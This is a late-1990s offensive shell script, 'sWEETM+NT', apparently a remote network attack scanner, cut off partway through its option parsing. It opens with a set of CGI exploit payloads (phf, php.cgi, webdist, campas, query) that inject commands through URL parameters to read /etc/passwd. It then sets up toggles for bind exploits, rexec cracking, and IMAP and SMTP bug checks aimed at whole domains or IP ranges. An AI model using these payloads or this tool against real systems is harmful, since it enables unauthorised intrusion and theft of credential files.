#
#                   sWEETM+NT - sWEET mAGiC + iNTERFACE
#                         rEM0TE nETW0RK sCAN T00L
#
#                       by \sPIRIT\ -s0ftpr0ject 99-
#

sweetVER='1.2.0'
extrabinPATH='bin'

# ------------------------ CGI BUGS EXPLOIT DATA ------------------------
testcgi="/cgi-bin/test-cgi?*"
nphtestcgi="/cgi-bin/nph-test-cgi?*"
phf="/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd"
php="/cgi-bin/php.cgi?/etc/passwd"
webdist="/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd"
campas="/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd%0a"
query="/cgi-bin/query?%0A/bin/cat%20/etc/passwd"
phfyp="/cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20/etc/passwd"

# code zone -----------------------------------------------------------------

clear ; echo -e "\a"

echo "sWEETM+NT v$sweetVER - sWEET mAGIC + iNTERFACE"
echo "rEM0TE nETW0RK sCAN T00L - \sPIRIT\ -s0ftpr0ject 99-"
echo "sUPP0RT/iNF0 eMAiL aDDRESS: immagika@usa.net"
echo " "

if [ -e sweetmint.LOCK ]
  then
      echo "* sWEETM+NT is initializing another scan session"
      echo "* Please re-run in a few seconds"
      echo " "
      exit 1
  else
      touch sweetmint.LOCK
fi

sysINFO=`uname -s -r`
sysNAME=`uname -n`
timeINFO=`date`

# User informations

userTMP=`id`
userID=`echo $userTMP | cut -d'(' --fields=2 | cut -d')' --fields=1`

if [ "$userID" = root ]
  then
      userTYPE='root'
  else
      userTYPE='user'
fi

echo "Launched by user: $userID"
echo "Your machine is $sysNAME running $sysINFO"
echo "Local time: $timeINFO"
echo " "

# parse config .smintrc and eventually create it

if [ ! -e .smintrc ]
  then
       echo "* Config file not found - creating a new one with defaults."
       touch .smintrc

       uniqPATH=`which uniq | cut -d':' --fields=1`
       nslookupPATH=`which nslookup | cut -d':' --fields=1`
       sortPATH=`which sort | cut -d':' --fields=1`
       cutPATH=`which cut | cut -d':' --fields=1`
       showmountPATH=`which showmount | cut -d':' --fields=1`       
       nohupPATH=`which nohup | cut -d':' --fields=1`
       fingerPATH=`which finger | cut -d':' --fields=1`
       lynxPATH=`which lynx | cut -d':' --fields=1`
       tarPATH=`which tar | cut -d':' --fields=1`
       gzipPATH=`which gzip | cut -d':' --fields=1`
       pingPATH=`which ping | cut -d':' --fields=1`
       rusersPATH=`which rusers | cut -d':' --fields=1`
       traceroutePATH=`which traceroute | cut -d':' --fields=1`

       if [ -z $uniqPATH ] || ( echo "$uniqPATH" | grep "which" > /dev/null )
          then
              echo "The <uniq> command was not found in the path"
              echo "If it is already on the system please add the path"
              echo "to the PATH env variable, otherwise install it"
              rm sweetmint.LOCK
              exit 1
       fi

       echo $uniqPATH >> .smintrc

       if [ -z $nslookupPATH ] || ( echo "$nslookupPATH" | grep "which" > /dev/null )
          then
              echo "* The <nslookup> command was not found in the path,"
              echo "* the host name resolver (parameter 'n') won't work"
              echo " " 
              echo "nslookup not found" >> .smintrc
              
       else

       echo $nslookupPATH >> .smintrc
 
       fi

       if [ -z $sortPATH ] || ( echo "$sortPATH" | grep "which" > /dev/null ) 
          then
              echo "The <sort> command was not found in the path"
              echo "If it is already on the system please add the path"
              echo "to the PATH env variable, otherwise install it"
              rm sweetmint.LOCK
              exit 1
       else

       echo $sortPATH >> .smintrc 

       fi

       if [ -z $cutPATH ] || ( echo "$cutPATH" | grep "which" > /dev/null )
          then
              echo "The <cut> command was not found in the path"
              echo "If it is already on the system please add the path"
              echo "to the PATH env variable, otherwise install it"
              rm sweetmint.LOCK
              exit 1
       fi

       echo $cutPATH >> .smintrc

       if [ -z $showmountPATH ] || ( echo "$showmountPATH" | grep "which" > /dev/null )
          then
              echo "* The <showmount> command was not found in the path,"
              echo "* the exportable dirs listing (parameter 'f') won't work"
              echo " "              
              echo "showmount not found" >> .smintrc
       else
      
       echo $showmountPATH >> .smintrc

       fi


       if [ -z $nohupPATH ] || ( echo "$nohupPATH" | grep "which" > /dev/null )
          then
              echo "The <nohup> command was not found in the path"
              echo "If it is already on the system please add the path"
              echo "to the PATH env variable, otherwise install it"
              rm sweetmint.LOCK
              exit 1
       fi

       echo $nohupPATH >> .smintrc

       if [ -z $fingerPATH ] || ( echo "$fingerPATH" | grep "which" > /dev/null )
          then
              echo "* The <finger> command was not found in the path,"
              echo "* the finger info collection (parameter 'F') won't work"
              echo " "
              echo "finger not found" >> .smintrc
       else
 
       echo $fingerPATH >> .smintrc
 
       fi

       if [ -z $lynxPATH ] || ( echo "$lynxPATH" | grep "which" > /dev/null )
          then
              echo "* The <lynx> command was not found in the path,"
              echo "* the cgi-bin scan (parameter 'c') won't work"
              echo " "           
              echo "lynx not found" >> .smintrc
       else

       echo $lynxPATH >> .smintrc
      
       fi

       if [ -z $tarPATH ] || ( echo "$tarPATH" | grep "which" > /dev/null )
         then
             echo "* The <tar> command was not found in the path,"
             echo "* the [-tar] command line parameter won't work"
             echo " "
             echo "tar not found" >> .smintrc
       else

       echo $tarPATH >> .smintrc           

       fi

       if [ -z $gzipPATH ] || ( echo "$gzipPATH" | grep "which" > /dev/null )
         then
             echo "* The <gzip> command was not found in the path,"
             echo "* the [-tar] command line parameter won't work"
             echo " "
             echo "gzip not found" >> .smintrc
       else

       echo $gzipPATH >> .smintrc

       fi

       if [ -z $pingPATH ] || ( echo "$pingPATH" | grep "which" > /dev/null ) 
         then
             echo "* The <ping> command was not found in the path,"
             echo "* the alive hosts scan (parameter 'a')"
             echo "* and the broadcast scan (parameter 't') won't work"
             echo " "
             echo "ping not found" >> .smintrc
       else

       echo $pingPATH >> .smintrc

       fi

       if [ -z $rusersPATH ] || ( echo "$rusersPATH" | grep "which" > /dev/null )
         then
             echo "* The <rusers> command was not found in the path,"
             echo "* the rexec crack (parameter 'R') won't work"
             echo " "
             echo "rusers not found" >> .smintrc
       else

       echo $rusersPATH >> .smintrc

       fi

       # traceroute isn't needed for now... don't tease the user

       if [ -z $traceroutePATH ] || ( echo "$traceroutePATH" | grep "which" > /dev/null )
         then
#             echo "* The <traceroute> command was not found in the path,"
#             echo "* the trace route (parameter 'p') won't work"
#             echo " "
             echo "traceroute not found" >> .smintrc
       else

       echo $traceroutePATH >> .smintrc

       fi

       # default scan parameters -> -full -disable:nas
       
       defaultPARAMETERS='-full -disable:nas'
       echo "params $defaultPARAMETERS" >> .smintrc

fi

echo -n "* Loading config file... "

uniqPATH=`cat .smintrc | grep uniq`
nslookupPATH=`cat .smintrc | grep nslookup`
sortPATH=`cat .smintrc | grep sort`
cutPATH=`cat .smintrc | grep cut`
showmountPATH=`cat .smintrc | grep showmount`
nohupPATH=`cat .smintrc | grep nohup`
fingerPATH=`cat .smintrc | grep finger`
lynxPATH=`cat .smintrc | grep lynx`
tarPATH=`cat .smintrc | grep tar`
gzipPATH=`cat .smintrc | grep gzip`
pingPATH=`cat .smintrc | grep ping`
rusersPATH=`cat .smintrc | grep rusers`
traceroutePATH=`cat .smintrc | grep traceroute`
defaultPARAMETERS=`cat .smintrc | grep params | $cutPATH --characters=8- `

echo "done."

echo "* Parameters loaded from config are: $defaultPARAMETERS"

# ---- PARSING COMMAND LINE ----

if [ $# -gt 4 ] 
  then
       echo "* ERROR: too may parameters on command line, maximum is 4"
       echo " "
       echo "Use: sweetmint [-file:<file>][-range:<range>][-single:<host>]"
       echo "               [-resume]<domain>[:<childs>] [-tar] [options]"
       echo " "
       echo "<domain> is the domain or subdomain you want to scan."
       echo "When [-tar] is specified, a .tar.gz archive will be created with"
       echo "the results."
       echo "When [options] are omitted, parameters loaded from config are used."
       echo "The [-file:<file>] will scan the hosts contained in <file>"
       echo "The [-range:<range>] will scan the specified range of IP's"
       echo "The [-single:<host>] will scan only the given host."
       echo "The [-resume:]<domain> will resume an aborted scan of <domain>."
       echo "The [:<childs>] parameter specifies the number of scan processes that"
       echo "will be working simultaneously on the list. If none is specified, one"
       echo "process will do all the work (slow!) (NOTE! NOT WORKING YET)"
       echo "Any parameter supplied will override che loaded parameters."
       echo "Parameters are CASE SENSITIVE."
       echo "Note that you MUST supply the command line parameters in the order."
       echo "shown above, otherwise the program won't parse them correctly."
       echo "Please read the file sweetmint.README for full informations"
       echo " "
       echo "Example: sweetmint microsux.com:3 -tar -full -disable:nas"
       echo " "
       rm sweetmint.LOCK
       exit 1
fi

if [ $# -lt 1 ]
  then
       echo "* ERROR: too few parameters on command line, minimum is <domain>"
       echo " "
       echo "Use: sweetmint [-file:<file>][-range:<range>][-single:<host>]"
       echo "               [-resume]<domain>[:<childs>] [-tar] [options]"
       echo " "
       echo "<domain> is the domain or subdomain you want to scan."
       echo "When [-tar] is specified, a .tar.gz archive will be created with"
       echo "the results."
       echo "When [options] are omitted, parameters loaded from config are used."
       echo "The [-file:<file>] will scan the hosts contained in <file>"
       echo "The [-range:<range>] will scan the specified range of IP's"
       echo "The [-single:<host>] will scan only the given host."
       echo "The [-resume:]<domain> will resume an aborted scan of <domain>."
       echo "The [:<childs>] parameter specifies the number of scan processes that"
       echo "will be working simultaneously on the list. If none is specified, one"
       echo "process will do all the work (slow!) (NOTE! NOT WORKING YET)"
       echo "Any parameter supplied will override che loaded parameters."
       echo "Parameters are CASE SENSITIVE."
       echo "Note that you MUST supply the command line parameters in the order"
       echo "shown above, otherwise the program won't parse them correctly."
       echo "Please read the file sweetmint.README for full informations"
       echo " "
       echo "Example: sweetmint microsux.com:3 -tar -full -disable:nas"
       echo " "
       rm sweetmint.LOCK
       exit 1
fi

commandLINE=`echo "$*"`
scanDOMAIN=`echo "$commandLINE" | $cutPATH -d' ' --fields=-1`

if [ "$scanDOMAIN" = -tar ] || [ "$scanDOMAIN" = -full ] || ( echo "$scanDOMAIN" | grep "enable" > /dev/null ) || ( echo "$scanDOMAIN" | grep "disable" > /dev/null )
  then 
      echo "* ERROR: <domain> to scan not specified on command line."
      echo " "
      echo "Use: sweetmint [-file:<file>][-range:<range>][-single:<host>]"
      echo "               [-resume]<domain>[:<childs>] [-tar] [options]"
      echo " "
      echo "<domain> is the domain or subdomain you want to scan."
      echo "When [-tar] is specified, a .tar.gz archive will be created with"
      echo "the results."
      echo "When [options] are omitted, parameters loaded from config are used."
      echo "The [-file:<file>] will scan the hosts contained in <file>"
      echo "The [-range:<range>] will scan the specified range of IP's"
      echo "The [-single:<host>] will scan only the given host."
      echo "The [-resume:]<domain> will resume an aborted scan of <domain>."
      echo "The [:<childs>] parameter specifies the number of scan processes that"
      echo "will be working simultaneously on the list. If none is specified, one"
      echo "process will do all the work (slow!) (NOTE! NOT WORKING YET)"
      echo "Any parameter supplied will override che loaded parameters."
      echo "Parameters are CASE SENSITIVE."
      echo "Note that you MUST supply the command line parameters in the order"
      echo "shown above, otherwise the program won't parse them correctly."
      echo "Please read the file sweetmint.README for full informations"
      echo " "
      echo "Example: sweetmint microsux.com:3 -tar -full -disable:nas"
      echo " "
      rm sweetmint.LOCK
      exit 1
fi

if ( echo "$scanDOMAIN" | grep "resume:" > /dev/null )
  then
      echo "$scanDOMAIN" >> r.tmp
      scanRESUME=`cat r.tmp | cut -d':' --fields=2`
      rm r.tmp
      echo "* Resuming aborted scan for domain [$scanRESUME]"
      tmpdir=`echo "$scanRESUME.tmp"`
      
      if [ ! -e $scanRESUME.done ]
        then
            echo "* ERROR: could not find resume informations."
            if [ -e $scanRESUME.resume ]
              then
                  rm $scanRESUME.resume
            fi

            rm sweetmint.LOCK
            exit 1
      fi

elif ( echo "$scanDOMAIN" | grep "single:" > /dev/null )
    then
        echo "$scanDOMAIN" >> s.tmp
        scanSINGLE=`cat s.tmp | cut -d':' --fields=2`
        rm s.tmp
        echo "* Single host to scan is [$scanSINGLE]"
        tmpdir=`echo "$scanSINGLE.tmp"`

elif ( echo "$scanDOMAIN" | grep "file:" > /dev/null )
    then
        echo "$scanDOMAIN" >> s.tmp
        scanFILE=`cat s.tmp | cut -d':' --fields=2`
        rm s.tmp
        echo "* Hosts to scan taken from file [$scanFILE]"
        tmpdir=`echo "$scanFILE.tmp"`

        isONfilelist='on'

        if [ ! -e $scanFILE ]
          then
              echo "* ERROR: could not find file containing hosts to scan."
              rm sweetmint.LOCK
              exit 1
        fi

elif ( echo "$scanDOMAIN" | grep "range:" > /dev/null )
    then
        echo "$scanDOMAIN" >> s.tmp
        scanRANGEtmp=`cat s.tmp | cut -d':' --fields=2`
        scanRANGE=`echo $RANDOM.range` 
        rm s.tmp
        tmpdir=`echo "$scanRANGE.tmp"`

        isONrange='on'
       
        rangeONE=`echo "$scanRANGEtmp" | cut -d'.' --fields=1`
        rangeTWO=`echo "$scanRANGEtmp" | cut -d'.' --fields=2`
        rangeTHREE=`echo "$scanRANGEtmp" | cut -d'.' --fields=3`
        rangeFOUR=`echo "$scanRANGEtmp" | cut -d'.' --fields=4`

        if ( ! echo "$scanRANGEtmp" | grep "$rangeONE.$rangeTWO.$rangeTHREE.$rangeFOUR" > /dev/null )
          then
              echo "* ERROR: the given IPs range is not in dotted quad format (ex: 1.2.3.4)"
              rm sweetmint.LOCK
              exit 1

          else
              if ( ! echo "$scanRANGEtmp" | grep -e [\*[:digit:][:digit:][:digit:]\-]'\.'[\*[:digit:][:digit:][:digit:]\-]'\.'[\*[:digit:][:digit:][:digit:]\-]'\.'[\*[:digit:][:digit:][:digit:]\-] > /dev/null )
                then
                    echo "* ERROR: the given IPs range contains invalid characters"
                    rm sweetmint.LOCK
                   exit 1
              fi
        fi

        if ( echo "$rangeONE" | grep "*" > /dev/null )
          then
              rangeONEstart=1
              rangeONEend=254

        elif ( echo "$rangeONE" | grep "-" > /dev/null )
            then
                rangeONEstart=`echo $rangeONE | cut -d'-' --fields=1`

                if [ "$rangeONEstart" -lt 1 ]
                  then
                      rangeONEstart=1

                elif [ "$rangeONEstart" -gt 254 ]
                    then
                        rangeONEstart=254
                fi

                rangeONEend=`echo $rangeONE | cut -d'-' --fields=2`

                if [ "$rangeONEend" -lt 1 ]
                  then
                      rangeONEend=1

                elif [ "$rangeONEend" -gt 254 ]
                    then
                        rangeONEend=254
                fi

        else

            if [ "$rangeONE" -lt 1 ]
              then
                  rangeONE=1

            elif [ "$rangeONE" -gt 254 ]
                then 
                    rangeONE=254            
            fi

            rangeONEstart=$rangeONE
            rangeONEend=$rangeONE

        fi

        if ( echo "$rangeTWO" | grep "*" > /dev/null )
          then
              rangeTWOstart=1
              rangeTWOend=254

        elif ( echo "$rangeTWO" | grep "-" > /dev/null )
            then
                rangeTWOstart=`echo $rangeTWO | cut -d'-' --fields=1`

                if [ "$rangeTWOstart" -lt 1 ]
                  then
                      rangeTWOstart=1

                elif [ "$rangeTWOstart" -gt 254 ]
                    then
                        rangeTWOstart=254
                fi

                rangeTWOend=`echo $rangeTWO | cut -d'-' --fields=2`

                if [ "$rangeTWOend" -lt 1 ]
                  then
                      rangeTWOend=1

                elif [ "$rangeTWOend" -gt 254 ]
                    then
                        rangeTWOend=254
                fi

        else

            if [ "$rangeTWO" -lt 1 ]
              then
                  rangeTWO=1

            elif [ "$rangeTWO" -gt 254 ]
                then 
                    rangeTWO=254            
            fi

            rangeTWOstart=$rangeTWO
            rangeTWOend=$rangeTWO

        fi

        if ( echo "$rangeTHREE" | grep "*" > /dev/null )
          then
              rangeTHREEstart=1
              rangeTHREEend=254

        elif ( echo "$rangeTHREE" | grep "-" > /dev/null )
            then
                rangeTHREEstart=`echo $rangeTHREE | cut -d'-' --fields=1`

                if [ "$rangeTHREEstart" -lt 1 ]
                  then
                      rangeTHREEstart=1

                elif [ "$rangeTHREEstart" -gt 254 ]
                    then
                        rangeTHREEstart=254
                fi

                rangeTHREEend=`echo $rangeTHREE | cut -d'-' --fields=2`

                if [ "$rangeTHREEend" -lt 1 ]
                  then
                      rangeTHREEend=1

                elif [ "$rangeTHREEend" -gt 254 ]
                    then
                        rangeTHREEend=254
                fi

        else

            if [ "$rangeTHREE" -lt 1 ]
              then
                  rangeTHREE=1

            elif [ "$rangeTHREE" -gt 254 ]
                then 
                    rangeTHREE=254            
            fi

            rangeTHREEstart=$rangeTHREE
            rangeTHREEend=$rangeTHREE

        fi

        if ( echo "$rangeFOUR" | grep "*" > /dev/null )
          then
              rangeFOURstart=1
              rangeFOURend=254

        elif ( echo "$rangeFOUR" | grep "-" > /dev/null )
            then
                rangeFOURstart=`echo $rangeFOUR | cut -d'-' --fields=1`

                if [ "$rangeFOURstart" -lt 1 ]
                  then
                      rangeFOURstart=1

                elif [ "$rangeFOURstart" -gt 254 ]
                    then
                        rangeFOURstart=254
                fi

                rangeFOURend=`echo $rangeFOUR | cut -d'-' --fields=2`

                if [ "$rangeFOURend" -lt 1 ]
                  then
                      rangeFOURend=1

                elif [ "$rangeFOURend" -gt 254 ]
                    then
                        rangeFOURend=254
                fi

        else

            if [ "$rangeFOUR" -lt 1 ]
              then
                  rangeFOUR=1

            elif [ "$rangeFOUR" -gt 254 ]
                then 
                    rangeFOUR=254            
            fi

            rangeFOURstart=$rangeFOUR
            rangeFOURend=$rangeFOUR

        fi

        echo "* Scanning sequentially IPs in range [$rangeONEstart.$rangeTWOstart.$rangeTHREEstart.$rangeFOURstart -> $rangeONEend.$rangeTWOend.$rangeTHREEend.$rangeFOURend]"

else

   echo "* Domain to scan is [$scanDOMAIN]"
   tmpdir=`echo "$scanDOMAIN.tmp"`
fi

if [ ! -d $tmpdir ]
  then
      echo -n "* Creating temporary directory for this run... "
      mkdir $tmpdir
      echo "done"
   
  else
      echo -n "* Cleaning up temporary directory for this run... "
      rm -rf $tmpdir
      mkdir $tmpdir
      echo "done"
fi

echo "* Temporary directory is set to $tmpdir/"

commandLINE=`echo "$commandLINE" | $cutPATH -d' ' --fields=1-`
tempPARMS=`echo "$commandLINE" | $cutPATH -d' ' --fields=2-`

if ( ! echo "$commandLINE" | grep -v tar >/dev/null )
  then 
     tar_results='on' 

     shift 1             

     if [ $3 ]
       then
            tempPARMS=`echo "$tempPARMS" | $cutPATH -d' ' --fields=2-`
       else
            tempPARMS=''
     fi
  else
     tar_results='off'
fi

if [ $2 ]
  then
      if ( ! echo "$tempPARMS" | grep -v "-">/dev/null )
        then
             defaultPARAMETERS=$tempPARMS
             echo "* Default parameters override due to command line options"
      fi

fi

echo "* Using parameters $defaultPARAMETERS"

# --------------------------------------------------------------
# settings of parameters
# --------------------------------------------------------------

echo "* Tasks to perform according to parameters:"

firstPARAM=`echo $defaultPARAMETERS | $cutPATH -d' ' --fields=-1`
secondPARAM=`echo $defaultPARAMETERS | $cutPATH -d' ' --fields=2-3`

if [ "$secondPARAM" = $firstPARAM ]
    then
        secondPARAM=''
fi

if ( echo "$firstPARAM" | grep "full" > /dev/null ) && ( echo "$secondPARAM" | grep "enable" > /dev/null ) 
  then
      resolve_host='on'
      alive_host='on'
      remote_fs='on'
      cgi_scan='on'
      wingate_scan='on'
      netbios_scan='on'
      rpc_info='on'
      bind_ver='on'
      bind_exploit='on'
      get_finger='on'
      nis_map='on'
      banner_dump='on'
      rusers_scan='on'
      bcast_scan='on'
      use_plugins='on'
      imap_bug='on'
      smtppop3_bugs='on'


elif ( echo "$firstPARAM" | grep "enable" > /dev/null ) && ( echo "$secondPARAM" | grep "full" > /dev/null )
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'
 
elif ( echo "$firstPARAM" | grep "full" > /dev/null ) && ( echo "$secondPARAM" | grep "disable" > /dev/null )
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

        tempVERIFY=`echo "$secondPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi


elif ( echo "$firstPARAM" | grep "disable" > /dev/null ) && ( echo "$secondPARAM" | grep "full" > /dev/null )
    then
        resolve_host='on'
        alive_host='on'
        remote_fs='on'
        cgi_scan='on'
        wingate_scan='on'
        netbios_scan='on'
        rpc_info='on'
        bind_ver='on'
        bind_exploit='on'
        get_finger='on'
        nis_map='on'
        banner_dump='on'
        rusers_scan='on'
        bcast_scan='on'
        use_plugins='on'
        imap_bug='on'
        smtppop3_bugs='on'

        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

elif ( echo "$firstPARAM" | grep "enable" > /dev/null ) && ( echo "$secondPARAM" | grep "disable" > /dev/null )
    then
        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=9-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='on'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='on'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='on'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='on'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='on'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='on'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='on'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='on'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='on'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='on'
        fi

        tempVERIFY=`echo "$secondPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='off'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='off'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='off'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='off'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='off'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='off'
        fi

        if ( echo "$tempVERIFY" | grep "i" > /dev/null )
          then
              imap_bug='off'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='off'
        fi

elif ( echo "$firstPARAM" | grep "disable" > /dev/null ) && ( echo "$secondPARAM" | grep "enable" > /dev/null )
    then
        tempVERIFY=`echo "$secondPARAM" | $cutPATH --characters=9-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='on'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='on'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='on'
        fi

        if ( echo "$tempVERIFY" | grep "b" > /dev/null )
          then
              bind_ver='on'
        fi

        if ( echo "$tempVERIFY" | grep "B" > /dev/null )
          then
              bind_exploit='on'
        fi

        if ( echo "$tempVERIFY" | grep "F" > /dev/null )
          then
              get_finger='on'
        fi

        if ( echo "$tempVERIFY" | grep "N" > /dev/null )
          then
              nis_map='on'
        fi

        if ( echo "$tempVERIFY" | grep "d" > /dev/null )
          then
              banner_dump='on'
        fi

        if ( echo "$tempVERIFY" | grep "R" > /dev/null )
          then
              rusers_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "t" > /dev/null )
          then
              bcast_scan='on'
        fi

        if ( echo "$tempVERIFY" | grep "x" > /dev/null )
          then
              use_plugins='on'
        fi

        if ( echo "$tempVERIFY" | grep "S" > /dev/null )
          then
              smtppop3_bugs='on'
        fi

        tempVERIFY=`echo "$firstPARAM" | $cutPATH --characters=10-`

        if ( echo "$tempVERIFY" | grep "n" > /dev/null )
          then
              resolve_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "a" > /dev/null )
          then
              alive_host='off'
        fi

        if ( echo "$tempVERIFY" | grep "f" > /dev/null )
          then
              remote_fs='off'
        fi

        if ( echo "$tempVERIFY" | grep "c" > /dev/null )
          then
              cgi_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "w" > /dev/null )
          then
              wingate_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "s" > /dev/null )
          then
              netbios_scan='off'
        fi

        if ( echo "$tempVERIFY" | grep "r" > /dev/null )
          then
              rpc_info='off'
